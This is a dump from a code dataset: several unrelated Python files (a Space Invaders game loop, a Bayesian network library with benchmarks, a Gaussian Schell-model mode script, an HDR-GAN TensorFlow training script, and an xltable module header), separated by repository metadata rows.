self.scoreboardText10 = Text(FONT, 20, "10- " + str(scores[9]), WHITE, 435, 281)
self.leaderboardText.draw(self.screen)
self.scoreboardText.draw(self.screen)
self.scoreboardText2.draw(self.screen)
self.scoreboardText3.draw(self.screen)
self.scoreboardText4.draw(self.screen)
self.scoreboardText5.draw(self.screen)
self.scoreboardText6.draw(self.screen)
self.scoreboardText7.draw(self.screen)
self.scoreboardText8.draw(self.screen)
self.scoreboardText9.draw(self.screen)
self.scoreboardText10.draw(self.screen)
for e in event.get():
if e.type == QUIT:
sys.exit()
if e.type == KEYUP:
self.startGame = False
self.gameOver = False
self.scoreBoard = False
self.mainScreen = True
def main(self):
while True:
if self.mainScreen:
self.reset(0, 5, True)
self.screen.blit(self.background, (0, 0))
self.background_stars(game)
self.titleText.draw(self.screen)
self.titleText2.draw(self.screen)
self.enemy1Text.draw(self.screen)
self.enemy2Text.draw(self.screen)
self.enemy3Text.draw(self.screen)
self.enemy4Text.draw(self.screen)
self.create_main_menu()
elif self.startGame:
if len(self.enemies) == 0:
current_time = time.get_ticks()
if current_time - self.gameTimer < 3000:
self.screen.blit(self.background, (0, 0))
self.background_stars(game)
self.scoreText2 = Text(FONT, 20, str(self.score), GREEN, 85, 5)
self.scoreText.draw(self.screen)
self.scoreText2.draw(self.screen)
self.nextRoundText.draw(self.screen)
self.livesText.draw(self.screen)
self.livesGroup.update(self.keys)
self.check_input()
if current_time - self.gameTimer > 3000:
# Move enemies closer to bottom
self.enemyPositionStart += 35
self.reset(self.score, self.lives)
self.make_enemies()
self.gameTimer += 3000
else:
current_time = time.get_ticks()
self.play_main_music(current_time)
self.screen.blit(self.background, (0, 0))
self.background_stars(game)
self.allBlockers.update(self.screen)
self.scoreText2 = Text(FONT, 20, str(self.score), GREEN, 85, 5)
self.scoreText.draw(self.screen)
self.scoreText2.draw(self.screen)
self.livesText.draw(self.screen)
self.check_input()
self.allSprites.update(self.keys, current_time, self.killedRow, self.killedColumn, self.killedArray)
self.explosionsGroup.update(self.keys, current_time)
self.check_collisions()
self.create_new_ship(self.makeNewShip, current_time)
self.update_enemy_speed()
if len(self.enemies) > 0:
self.make_enemies_shoot()
elif self.gameOver:
current_time = time.get_ticks()
# Reset enemy starting position
self.enemyPositionStart = self.enemyPositionDefault
self.create_game_over(current_time)
elif self.scoreBoard:
scoreboard = Score()
self.scores = scoreboard.order_scores()
self.create_scoreboard(self.scores)
display.update()
self.clock.tick(60)
if __name__ == '__main__':
try:
ScoreOrm.create_table()
StateOrm.create_table()
except peewee.OperationalError:
print('Table already exists!')
game = SpaceInvaders()
game.main()
| 43.298625 | 120 | 0.549163 | 2,413 | 22,039 | 4.95317 | 0.155823 | 0.032631 | 0.030455 | 0.034639 | 0.341867 | 0.271168 | 0.221386 | 0.168675 | 0.159053 | 0.153029 | 0 | 0.04461 | 0.342938 | 22,039 | 508 | 121 | 43.383858 | 0.780747 | 0.017696 | 0 | 0.280899 | 0 | 0 | 0.027873 | 0.00208 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044944 | false | 0 | 0.040449 | 0 | 0.092135 | 0.002247 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2acb51e0b9aa7da38f2ee50711be597674bf764 | 8,528 | py | Python | bayesian_net.py | lliryc/baytrino | 272bd17b7a7c9fb027e976adb7278ec5b582d36c | [
"Apache-2.0"
] | 6 | 2021-01-29T12:13:51.000Z | 2022-01-28T18:02:38.000Z | bayesian_net.py | lliryc/baytrino | 272bd17b7a7c9fb027e976adb7278ec5b582d36c | [
"Apache-2.0"
] | null | null | null | bayesian_net.py | lliryc/baytrino | 272bd17b7a7c9fb027e976adb7278ec5b582d36c | [
"Apache-2.0"
] | null | null | null | import numpy as np
import typing as t
from value_vector import ValueVector
from conditional_distribution import ProbRelation
import functools
import random
from pgmpy.models import BayesianModel
from pgmpy.factors.discrete import TabularCPD, DiscreteFactor
from pgmpy.inference import VariableElimination, Inference
from pgmpy.sampling import BayesianModelSampling
import time
import pgmpy
#import dask
#import dask.array as da
#dask.config.set(scheduler='threads')
class BayesianNet:
def __init__(self):
self.nodes = {}
self.edges = {}
self.edges_inv = {}
self.var_cache = {}
self.factor_cache = {}
def add_node(self, name:str, distr:t.List[float]):
if name in self.nodes:
raise Exception(f"Node with name '{name}' already exists")
self.nodes[name] = ValueVector(distr)
self.edges[name] = {}
def add_edge(self, ancestor: str, descendent: str, conditional_prob_matrix: t.List[t.List[float]]): # P(a|d)
if ancestor not in self.nodes:
raise Exception(f"Node with name '{ancestor}' doesn't exist yet")
if descendent not in self.nodes:
raise Exception(f"Node with name '{descendent}' doesn't exist yet")
if descendent in self.edges[ancestor]:
raise Exception(f"The edge ('{ancestor}','{descendent}') already exists")
cpd = ProbRelation(conditional_prob_matrix, (len(conditional_prob_matrix), len(conditional_prob_matrix[0])))
self.edges[ancestor][descendent] = cpd
def get_evidence(self, vars:t.Dict[str, int], target_var:str):
self.edges_inv = {}
for ancestor in self.edges:
for descendent in self.edges[ancestor]:
if descendent not in self.edges_inv:
self.edges_inv[descendent] = {}
self.edges_inv[descendent][ancestor] = self.edges[ancestor][descendent]
self.var_cache = dict(map(lambda var_key: (var_key, ValueVector([ float(i==vars[var_key]) for i in range(0, self.nodes[var_key].size())], index=vars[var_key])), vars.keys()))
probs = self._compute_var(target_var).probs
denom = np.sum(probs)
return (probs / denom).tolist()
def _calc_di(self, cpd:ProbRelation, ancestor_key, ancestor_distr:ValueVector, child_key)->ProbRelation:
if ancestor_distr.index != -1:
cpd_mx: np.ndarray = cpd.distibution[ancestor_distr.index].reshape(1, cpd.shape[1])
ancestor_vec: np.ndarray = np.array([self.nodes[ancestor_key].probs[ancestor_distr.index]])
ancestor_size = len(ancestor_vec)
else:
cpd_mx: np.ndarray = cpd.distibution
ancestor_vec: np.ndarray = self.nodes[ancestor_key].probs
ancestor_size = len(ancestor_vec)
child_vec: np.ndarray = self.nodes[child_key].probs
child_size = len(child_vec)
denom = cpd_mx * child_vec.reshape(1,child_size)
result = (ancestor_vec.reshape(ancestor_size, 1) / denom) - np.array([1.0])
return ProbRelation(result, result.shape)
def _mult_pair_di(self, d1:ProbRelation, d2:ProbRelation)->ProbRelation:
d1_splits = np.hsplit(d1.distibution, d1.shape[1])
d2_splits = np.hsplit(d2.distibution, d2.shape[1])
d_splits = [np.ndarray.reshape(d1_splits[k].reshape(d1.shape[0],1) * d2_splits[k].reshape(1, d2.shape[0]), (d1.shape[0] * d2.shape[0], 1)) for k in range(0, d1.shape[1])]
assembly = np.hstack(d_splits)
return ProbRelation(assembly, assembly.shape)
def _calc_a(self, child_key)->np.ndarray:
vec = self.nodes[child_key].probs
complement = np.array([1.0]) - vec
return complement / vec
def _compute_var(self, var:str)->ValueVector:
if var in self.var_cache:
return self.var_cache[var]
if var not in self.edges_inv:
return None
ancestor_vars = self.edges_inv[var]
kv_anc = map(lambda ancestor_key: (ancestor_key, self._compute_var(ancestor_key)), ancestor_vars)
kv_anc = list(filter(lambda tuple: tuple[1] is not None, kv_anc))
var_vec = self._compute_factor(var, *kv_anc)
probs = (var_vec.probs * self.nodes[var].probs)
self.var_cache[var] = ValueVector(probs)
return ValueVector(probs)
def __hash__(self):
return hash(repr(self))
@staticmethod
def _apply_cpd(v:ValueVector, cpd: ProbRelation):
if v.index != -1:
rel = cpd.distibution[v.index].reshape(1, cpd.distibution.shape[1])
return ProbRelation(rel, rel.shape)
else:
rel = v.probs.reshape(v.size(), 1) * cpd.distibution
return ProbRelation(rel, rel.shape)
@staticmethod
def _mult_pair_cpd(cpd1: ProbRelation, cpd2: ProbRelation)->ProbRelation:
if(cpd2 is None):
return cpd1
d1_splits = np.hsplit(cpd1.distibution, cpd1.shape[1])
d2_splits = np.hsplit(cpd2.distibution, cpd2.shape[1])
d_splits = [np.ndarray.reshape(d1_splits[k].reshape(cpd1.shape[0],1) * d2_splits[k].reshape(1, cpd2.shape[0]), (cpd1.shape[0] * cpd2.shape[0], 1)) for k in range(0, cpd1.shape[1])]
assembly = np.hstack(d_splits)
return ProbRelation(assembly, assembly.shape)
def _compute_factor(self, var_child, *var_ancestors)->ValueVector:
h = hash(tuple([var_child, var_ancestors]))
if h in self.factor_cache:
return self.factor_cache[h]
anc_dict = dict(var_ancestors)
anc_rels = list(map(lambda var_anc: self._apply_cpd(anc_dict[var_anc], self.edges[var_anc][var_child]), anc_dict))
len_rels = len(anc_rels)
while(len_rels > 1):
if len_rels % 2 == 1:
anc_rels.append(None)
len_rels = len_rels + 1
anc_rels = list(map(lambda i: self._mult_pair_cpd(anc_rels[i], anc_rels[i+1]), range(0, len_rels//2)))
len_rels = len(anc_rels)
dist = anc_rels[0].distibution
vec = dist.sum(axis=0)
res = ValueVector(vec)
self.factor_cache[h] = res
return res
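# --- Demo / benchmark helpers -------------------------------------------------
# run_baytrino_model() builds a small three-node network over X, Y and A and
# prints the posterior P(A | X=0, Y=2); test1_baytrino() and test1_pgmpy() time
# 1000 evidence queries on a 100-parent star graph, comparing this
# implementation against pgmpy's VariableElimination on the same structure.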
def run_baytrino_model():
bnet = BayesianNet()
bnet.add_node('Y', [0.4, 0.3, 0.3])
bnet.add_node('X', [0.3, 0.4, 0.3])
bnet.add_node('A', [0.5, 0.5])
bnet.add_edge('X', 'A', [[0.2, 0.4], [0.55, 0.25], [0.25, 0.35]])
bnet.add_edge('Y', 'A', [[0.1, 0.7], [0.4, 0.2], [0.5, 0.1]])
pA = bnet.get_evidence({'X': 0, 'Y': 2}, 'A')
print(pA)
def test1_baytrino():
start_time = time.time()
bnet = BayesianNet()
bnet.add_node('A', [0.5, 0.5])
vals = {}
vals_ix = {}
for i in range(0, 100):
var = 'X' + str(i)
bnet.add_node(var, [0.3, 0.4, 0.3])
bnet.add_edge(var, 'A', [[0.2, 0.4], [0.55, 0.25], [0.25, 0.35]])
vals[var] = 0
vals_ix[i] = var
for i in range(0, 1000):
index = random.randrange(0,100)
if(vals[vals_ix[index]] == 1):
vals[vals_ix[index]] = 0
else:
vals[vals_ix[index]] = 1
bnet.get_evidence(vals, 'A')
end_time = time.time()
return end_time - start_time
def run_pgmpy_model():
edges = []
cdp_vars = []
cdp_a = TabularCPD('A', 2, [[0.5], [0.5]])
cdp_vars.append(cdp_a)
cdp_x = TabularCPD('X', 3, [[0.2, 0.4], [0.55, 0.25], [0.25, 0.35]], ['A'], [2])
cdp_vars.append(cdp_x)
edges.append(('A', 'X'))
cdp_y = TabularCPD('Y', 3, [[0.1, 0.7], [0.4, 0.2], [0.5, 0.1]], ['A'], [2])
cdp_vars.append(cdp_y)
edges.append(('A', 'Y'))
bmodel = BayesianModel(edges)
bmodel.add_cpds(*cdp_vars)
inf = VariableElimination(bmodel)
pA = inf.query(['A'], {'X': 0, 'Y': 2})
print(pA)
def test1_pgmpy():
start_time = time.time()
edges = []
cdp_vars = []
cdp_a = TabularCPD('A', 2, [[0.5], [0.5]])
cdp_vars.append(cdp_a)
vals = {}
for i in range(0,100):
var = 'X' + str(i)
cdp_x = TabularCPD(var, 3, [[0.2, 0.4], [0.55, 0.25], [0.25, 0.35]], ['A'], [2])
cdp_vars.append(cdp_x)
edges.append(('A', var))
vals[var] = 0
bmodel = BayesianModel(edges)
bmodel.add_cpds(*cdp_vars)
inf = VariableElimination(bmodel)
for i in range(0, 1000):
(inf.query(['A'], vals))
end_time = time.time()
return end_time - start_time
if __name__ == '__main__':
#print(f"test1 brazil, time elapsed '{test1_pgmpy()}'")
print(f"test1 baytrino, time elapsed '{test1_baytrino()}'")
| 33.84127 | 188 | 0.61128 | 1,239 | 8,528 | 4.039548 | 0.139629 | 0.026973 | 0.005395 | 0.010989 | 0.358042 | 0.270929 | 0.228571 | 0.2004 | 0.165834 | 0.151049 | 0 | 0.03794 | 0.239681 | 8,528 | 251 | 189 | 33.976096 | 0.733961 | 0.015361 | 0 | 0.297297 | 0 | 0 | 0.032358 | 0.003463 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086486 | false | 0 | 0.064865 | 0.005405 | 0.243243 | 0.016216 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2ad6223c7124029b0c85f3bdb142b833ded8b8e | 2,355 | py | Python | GSM/GSM_numeric.py | srio/paper-transfocators-resources | 917d8b4114056f62c84b295579e55bf5f0b56b6b | [
"MIT"
] | 1 | 2021-03-25T15:34:56.000Z | 2021-03-25T15:34:56.000Z | GSM/GSM_numeric.py | srio/paper-transfocators-resources | 917d8b4114056f62c84b295579e55bf5f0b56b6b | [
"MIT"
] | null | null | null | GSM/GSM_numeric.py | srio/paper-transfocators-resources | 917d8b4114056f62c84b295579e55bf5f0b56b6b | [
"MIT"
] | null | null | null | import numpy
from srxraylib.plot.gol import plot, plot_image, set_qt
set_qt()
def W(x1,x2):
delta_x = x2 - x1
mu = numpy.exp(-delta_x ** 2 / 2 / sigma_xi ** 2)
s1 = numpy.exp(-x1 ** 2 / 2 / sigma_x ** 2)
s2 = numpy.exp(-x2 ** 2 / 2 / sigma_x ** 2)
return mu * numpy.sqrt(s1) * numpy.sqrt(s2)
def get_coherent_fraction_exact(beta):
q = 1 + 0.5 * beta**2 + beta * numpy.sqrt( (beta/2)**2 + 1 )
q = 1.0 / q
CF = 1 - q
return CF
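# Sanity check on the closed-form result above: beta -> 0 gives q -> 1 and
# CF -> 0 (incoherent limit), beta -> infinity gives q -> 0 and CF -> 1, and
# for the small beta used below, get_coherent_fraction_exact(0.0922395) is
# roughly 0.088, i.e. CF ~ beta in the small-beta regime.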
if __name__ == "__main__":
beta = 0.0922395 #1.151 #0.02 #
sigma_x = 3.03783e-05
sigma_xi = beta * sigma_x
x1 = numpy.linspace(-0.00012, 0.00012, 400)
# plot(x1, numpy.exp(-x1**2/(2*sigma_x**2)))
X1 = numpy.outer(x1, numpy.ones_like(x1))
X2 = numpy.outer(numpy.ones_like(x1), x1 )
cross_spectral_density = W(X1,X2)
indices = numpy.arange(x1.size)
plot(x1, W(x1,x1),
x1, cross_spectral_density[indices, indices],
x1, numpy.exp(-x1**2/2/sigma_x**2),
title="Spectral density", legend=["SD function", "SD array", "Gaussian with sigma_x"])
plot_image(cross_spectral_density, x1, x1)
#
# diagonalize the CSD
#
w, v = numpy.linalg.eig(cross_spectral_density)
print(w.shape, v.shape)
idx = w.argsort()[::-1] # large to small
eigenvalues = numpy.real(w[idx])
eigenvectors = -v[:, idx].T # eigenvector sign is arbitrary; flipped here to match the analytic modes compared below
print(eigenvalues[0:10])
plot(numpy.arange(eigenvalues.size), eigenvalues)
print("CF=", eigenvalues[0] / eigenvalues.sum(), get_coherent_fraction_exact(beta))
from wofry.propagator.util.gaussian_schell_model import GaussianSchellModel1D, GaussianSchellModel2D
mode = 5
gsm = GaussianSchellModel1D(1.0, sigma_x, sigma_xi)
y1 = eigenvectors[mode, :]
y1 = y1 / numpy.sqrt((y1**2).sum() * (x1[1]-x1[0])) # rescale the unit-norm eigenvector to unit L2 norm on the x grid
y2 = gsm.phi(mode, x1)
print("modulus: ", (y2**2).sum() * (x1[1]-x1[0]))
plot(x1, y1 ,
x1, y2, legend=["numeric","theoretical"] )
#
# spectral density
#
sd = numpy.zeros_like(x1)
for i in range(sd.size):
sd[i] = cross_spectral_density[i,i]
sdmodes = numpy.zeros_like(x1, dtype=complex)
for i in range(sdmodes.size):
sdmodes += eigenvalues[i] * eigenvectors[i, :]**2
plot(x1, sd,
x1, sdmodes,
legend=["SD","SD from modes"],
title="Spectral density")
| 29.074074 | 104 | 0.603397 | 353 | 2,355 | 3.892351 | 0.303116 | 0.034935 | 0.025473 | 0.02329 | 0.141194 | 0.058952 | 0.044396 | 0.044396 | 0.030568 | 0 | 0 | 0.071863 | 0.231847 | 2,355 | 80 | 105 | 29.4375 | 0.687673 | 0.050955 | 0 | 0 | 0 | 0 | 0.05623 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036364 | false | 0 | 0.054545 | 0 | 0.127273 | 0.072727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2ad983fcf46426af99729be2b91a1990d21eb6e | 12,057 | py | Python | train_unetpps.py | nonu116/HDR-GAN | 239f68dd07f1970e0317515a313b69a9c3914f74 | [
"MIT"
] | 11 | 2021-07-11T11:33:50.000Z | 2022-03-28T15:32:54.000Z | train_unetpps.py | nonu116/HDR-GAN | 239f68dd07f1970e0317515a313b69a9c3914f74 | [
"MIT"
] | null | null | null | train_unetpps.py | nonu116/HDR-GAN | 239f68dd07f1970e0317515a313b69a9c3914f74 | [
"MIT"
] | null | null | null | import os
import tensorflow as tf
import data
import hdr_utils
import tensorkit as tk
from config import config
from loss import tf_ms_ssim_loss
from model.gan import PatchDiscriminator
from model.unetpps import UnetppGeneratorS
from tensorkit import hparam
from tensorkit.gan_loss import sphere as sphere_gan
from tensorkit.utils import get_time
from utils import l1_loss
# Placeholders: only UnetppGeneratorS is imported above; selecting the
# 'unetpp' or 'unets' generator in graph() requires these classes to be provided.
UnetppGenerator, UnetGeneratorS = None, None
def make_log_dir():
if config.UNETPPS:
assert config.GENERATOR in ['', 'unetpps']
config.GENERATOR = 'unetpps'
tag = config.GENERATOR
if tag == '':
tag = 'unetpps'
p = '_'.join([get_time(), str(os.getpid()),
tag if config.UNETPPS else '',
config.safely_get('GAN', default=''),
'dpatchOri' if config.safely_get('PATCH_ORI', False) else '',
config.NORM,
'mu{}'.format(config.MU) if config.MU is not None and config.MU != 5000. else '',
'inHDR' if config.IN_HDR else '',
'oHDR' if config.OUT_HDR else '',
'lsTP' if not config.N_LOSS_TP else '',
'lsHDR' if config.LOSS_HDR else '',
'rp' if config.random_place else '',
config.safely_get('TAG', ''),
]).strip('_')
while '__' in p:
p = p.replace('__', '_')
log_dir = os.path.join(config.LOG_DIR, p)
return log_dir, tag
HPARAM_FILE = 'c{}.conf'.format(os.getpid())
def gradient_sum(loss, var, tag):
assert len(var) > 0
grad = tf.gradients(loss, var)
for g, v in zip(grad, var):
if g is not None:
tk.summary.histogram(g, '{}/{}'.format(tag, v.name))
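# Usage note: called below as, e.g., gradient_sum(g_loss, model.variable_out(),
# 'g_loss'), which logs one histogram per trainable variable that actually
# receives a gradient for that loss.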
def _graph(datas, model, discriminator, train, reuse, summary_feat, mu=None):
(ldr1, ldr2, ldr3), (ldr1r, ldr2r, ldr3r), (tp1, tp2, tp3), (tp1r, tp2r, tp3r), \
(hdr1, hdr2, hdr3), (hdr1r, hdr2r, hdr3r), hdr, _inp_exps, _ref_exps = datas
with tf.name_scope('inputs'):
if config.random_place:
random = tf.random_uniform([2], 0, 1.0, dtype=tf.float32)
ldr2, tp2, hdr2 = tf.cond(tf.less(random[0], 0.25),
lambda: tf.cond(tf.less(random[1], 0.3), lambda: (ldr1r, tp1r, hdr1r),
lambda: (ldr3r, tp3r, hdr3r)),
lambda: (ldr2, tp2, hdr2))
image1 = tf.concat([ldr1, hdr1 if config.IN_HDR else tp1], axis=-1)
image2 = tf.concat([ldr2, hdr2 if config.IN_HDR else tp2], axis=-1)
image3 = tf.concat([ldr3, hdr3 if config.IN_HDR else tp3], axis=-1)
gt_hdr = hdr
gt_tonemap = hdr_utils.tonemap(hdr, mu=mu)
outputs, features = model.graph(image1, image2, image3,
train=train, summary_feat=summary_feat, get_features=True, reuse=reuse)
if config.OUT_HDR:
out_hdrs = outputs
out_tps = [hdr_utils.tonemap(h, mu=mu) for h in out_hdrs]
else:
out_tps = outputs
out_hdrs = [hdr_utils.itonemap(tp, mu=mu) for tp in out_tps]
with tf.name_scope('gan_real'):
gan_real = tf.identity(gt_tonemap)
dis_real = discriminator.graph(gan_real, reuse=reuse) if discriminator is not None else None
dis_fakes = []
losses = dict()
sums = dict()
d_losses, g_losses = dict(), dict()
# ==================== alpha =======================
l1_hdr_alpha, d_alpha, g_alpha = None, None, None
with tf.variable_scope('alpha', reuse=tf.AUTO_REUSE):
if True or config.LOSS_HDR: # always create the hparam so it stays tunable at runtime, even when the HDR loss is off
l1_hdr_alpha = hparam.get_hparamter('l1_hdr_alpha', initializer=1.)
hparam.set_sync(l1_hdr_alpha, 'L1_HDR_ALPHA', HPARAM_FILE)
sums['alpha/l1_hdr_alpha'] = l1_hdr_alpha
if discriminator is not None:
g_alpha = hparam.get_hparamter('g_alpha', initializer=1.)
d_alpha = hparam.get_hparamter('d_alpha', initializer=1.)
hparam.set_sync(g_alpha, 'G_ALPHA', HPARAM_FILE)
hparam.set_sync(d_alpha, 'D_ALPHA', HPARAM_FILE)
sums['alpha/g_alpha'] = g_alpha
sums['alpha/d_alpha'] = d_alpha
# ================== loss item =====================
for ind, (fake_hdr, fake_tp) in enumerate(zip(out_hdrs, out_tps)):
if not config.N_LOSS_TP:
losses['l1/{}'.format(ind)] = l1_loss(gt_tonemap, fake_tp)
else:
sums['l1/{}'.format(ind)] = l1_loss(gt_tonemap, fake_tp)
if config.LOSS_HDR:
losses['l1_hdr/{}'.format(ind)] = l1_loss(gt_hdr, fake_hdr) * l1_hdr_alpha
else:
sums['l1_hdr/{}'.format(ind)] = l1_loss(gt_hdr, fake_hdr) * l1_hdr_alpha
if config.MSSIM_L1:
sums['l1/{}'.format(ind)] = l1_loss(gt_tonemap, fake_tp)
sums['MSSIM/{}'.format(ind)] = tf_ms_ssim_loss(gt_tonemap, fake_tp)
_alpha = 0.84
losses['MSSIM_L1/{}'.format(ind)] = (1 - _alpha) * sums['l1/{}'.format(ind)] \
+ _alpha * sums['MSSIM/{}'.format(ind)]
if discriminator is not None:
gan_fake = fake_tp
if config.GAN == 'sphere':
dis_fake = discriminator.graph(gan_fake, reuse=True)
dis_fakes.append(dis_fake)
g_loss, d_loss, (distance_real, distance_fake, g_convergence_to_zero, d_convergence_to_min) = \
sphere_gan(dis_real, dis_fake, None, 3, reuse=ind != 0)
g_losses['g_loss/{}'.format(ind)] = g_loss
d_losses['d_loss/{}'.format(ind)] = d_loss
sums['sphere/distance_real/{}'.format(ind)] = distance_real
sums['sphere/distance_fake/{}'.format(ind)] = distance_fake
sums['sphere/g_convergence_to_zero/{}'.format(ind)] = g_convergence_to_zero
sums['sphere/d_convergence_to_min/{}'.format(ind)] = d_convergence_to_min
elif config.GAN == 'pgan':
dis_real = discriminator.graph(gan_real, reuse=reuse or ind != 0)
dis_fake = discriminator.graph(gan_fake, reuse=True)
distance = l1_loss(dis_real, dis_fake)
g_losses['g_loss/{}'.format(ind)] = distance
d_losses['d_loss/{}'.format(ind)] = -distance
sums['gan/g_loss/{}'.format(ind)] = distance
sums['gan/d_loss/{}'.format(ind)] = -distance
else:
raise RuntimeError('invalid gan: {}'.format(config.GAN))
# ================== loss total ====================
tk.logger.info('loss key: {}'.format(' '.join(losses.keys())))
_loss = loss = tf.add_n(list(losses.values()))
g_loss, d_loss = None, None
if discriminator is not None:
g_loss, d_loss = tf.add_n(list(g_losses.values())) * g_alpha, tf.add_n(list(d_losses.values())) * d_alpha
loss += g_loss
# ==================== summary =====================
assert all(k not in sums for k in losses.keys()), 'losses: {}\nsums:{}'.format(losses.keys(), sums.keys())
sums.update(losses)
for k, v in sums.items():
tk.summary.scalar(v, k)
with tf.name_scope('gradient_sum'):
outvars = model.variable_out()
# -------- gradient gan ---------
if discriminator is not None:
_outvars = discriminator.variable_out()
with tf.name_scope('gan'):
gradient_sum(g_loss, outvars, 'g_loss')
gradient_sum(_loss, outvars, 'ng_loss')
gradient_sum(d_loss, _outvars, 'd_loss')
# -------- gradient l1 ----------
_loss = [v for k, v in losses.items() if 'l1/' in k]
if not config.N_LOSS_TP:
with tf.name_scope('l1'):
assert len(_loss) in [0, 4, config.DEPTH - 1], _loss
if len(_loss) != 0:
_loss = tf.add_n(_loss)
gradient_sum(_loss, outvars, 'l1')
# -------- gradient l1_hdr ----------
if config.LOSS_HDR:
with tf.name_scope('l1_hdr'):
_loss = [v for k, v in losses.items() if 'l1_hdr/' in k]
assert len(_loss) in [0, 4, config.DEPTH - 1], _loss
if len(_loss) != 0:
_loss = tf.add_n(_loss)
gradient_sum(_loss, outvars, 'l1_hdr')
# -------- images ----------
if discriminator is not None:
with tf.name_scope('sum_sphere'):
gan_sum_real = tk.image.colorize(dis_real)
gan_sum_real = tf.concat([gan_sum_real for _ in dis_fakes], 2)
gan_sum_fake = tf.concat([i for i in dis_fakes], 2)
gan_sum_fake = tk.image.colorize(gan_sum_fake)
gan_sum_diff = tf.concat([tf.abs(i - dis_real) for i in dis_fakes], 2)
gan_sum_diff = tk.image.colorize(gan_sum_diff)
sum_im = tf.concat([gan_sum_real, gan_sum_fake, gan_sum_diff], axis=1)
tk.summary.images(sum_im, 3, 'sphere')
with tf.name_scope('summary'):
reals = tf.concat([tp1, tp2, tp3, gt_tonemap], axis=2)
fakes = out_tps + [tf.ones_like(out_tps[0]) for _ in range(4 - len(out_tps))]
fakes = tf.concat(fakes, axis=2)
sum_ims = tf.concat([reals, fakes], axis=1)
tk.summary.images(sum_ims, 3, 'reals_fakes')
return loss, d_loss
def graph():
if config.UNETPPS:
assert config.GENERATOR in ['', 'unetpps']
config.GENERATOR = 'unetpps'
if config.GENERATOR == 'unetpps':
model = UnetppGeneratorS(depth=config.DEPTH, norm=config.NORM)
elif config.GENERATOR == 'unets':
model = UnetGeneratorS(depth=config.DEPTH, norm=config.NORM)
elif config.GENERATOR in ['', 'unetpp']:
model = UnetppGenerator(depth=config.DEPTH, norm=config.NORM)
else:
raise NotImplementedError('generator: {}'.format(config.GENERATOR))
discriminator = PatchDiscriminator(ori=config.PATCH_ORI) if config.LOSS_GAN else None
train_data = data.get_train_data(mu=config.MU)
train_loss, d_loss = _graph(train_data, model, discriminator, train=True, reuse=None, summary_feat=True,
mu=config.MU)
val_loss = None
if config.VAL:
val_data = data.get_val_data()
with tf.name_scope('val'):
val_loss, _ = _graph(val_data, model, None, train=False, reuse=True, summary_feat=False, mu=None)
if config.LOSS_GAN:
return (train_loss, d_loss), (model, discriminator), val_loss
else:
return train_loss, model, val_loss
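# Return contract of graph(): ((train_loss, d_loss), (generator, discriminator),
# val_loss) when config.LOSS_GAN is set, otherwise (train_loss, generator,
# val_loss); val_loss is None unless config.VAL is enabled.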
def args(parser):
parser.add_argument('--depth', dest='DEPTH', default=3, choices=(2, 3, 4, 5), type=int)
parser.add_argument('--norm', '-norm', help='normalization',
dest='NORM', default='sn', choices=['in', 'ln', 'nn', 'wn', 'sn'])
parser.add_argument('--loss_gan', dest='LOSS_GAN', default=False, action='store_true')
parser.add_argument('--gan', dest='GAN', default='sphere', choices=['sphere', 'wgan_gp', 'pgan'])
parser.add_argument('--loss_hdr', dest='LOSS_HDR', default=False, action='store_true')
parser.add_argument('--mssim_l1', dest='MSSIM_L1', default=False, action='store_true')
parser.add_argument('--train_hw', dest='train_hw', type=int, nargs=2, default=...)
parser.add_argument('--random_place', dest='random_place', default=False, action='store_true')
parser.add_argument('--patch_ori', dest='PATCH_ORI', default=False, action='store_true')
parser.add_argument('--mu', dest='MU', default=None, type=float)
parser.add_argument('--in_hdr', dest='IN_HDR', default=False, action='store_true')
parser.add_argument('--out_hdr', dest='OUT_HDR', default=False, action='store_true')
parser.add_argument('--n_loss_tp', dest='N_LOSS_TP', default=False, action='store_true')
parser.add_argument('--unetpps', dest='UNETPPS', default=False, action='store_true')
parser.add_argument('--gen', dest='GENERATOR', default='', choices=('unetpps', 'unetpp', 'unets', 'unet'))
return parser
| 47.845238 | 113 | 0.586962 | 1,606 | 12,057 | 4.174346 | 0.143836 | 0.026253 | 0.038037 | 0.020137 | 0.329654 | 0.256712 | 0.190036 | 0.186307 | 0.115901 | 0.075477 | 0 | 0.015429 | 0.25819 | 12,057 | 251 | 114 | 48.035857 | 0.734123 | 0.02737 | 0 | 0.142202 | 0 | 0 | 0.088411 | 0.009131 | 0 | 0 | 0 | 0 | 0.027523 | 1 | 0.022936 | false | 0 | 0.059633 | 0 | 0.105505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2b0b61545531077cc783fddfbeaea17e72bd958 | 6,819 | py | Python | xltable/workbook.py | fkarb/xltable | 7a592642d27ad5ee90d2aa8c26338abaa9d84bea | [
"MIT"
] | 4 | 2017-03-09T20:04:35.000Z | 2020-01-18T16:24:33.000Z | xltable/workbook.py | fkarb/xltable | 7a592642d27ad5ee90d2aa8c26338abaa9d84bea | [
"MIT"
] | 6 | 2017-12-05T13:22:10.000Z | 2018-01-29T13:50:27.000Z | xltable/workbook.py | fkarb/xltable | 7a592642d27ad5ee90d2aa8c26338abaa9d84bea | [
"MIT"
] | 6 | 2017-10-26T16:44:27.000Z | 2021-08-16T19:39:21.000Z | """
Collection of worksheet instances
"""
import logging
_log = logging.getLogger(__name__)
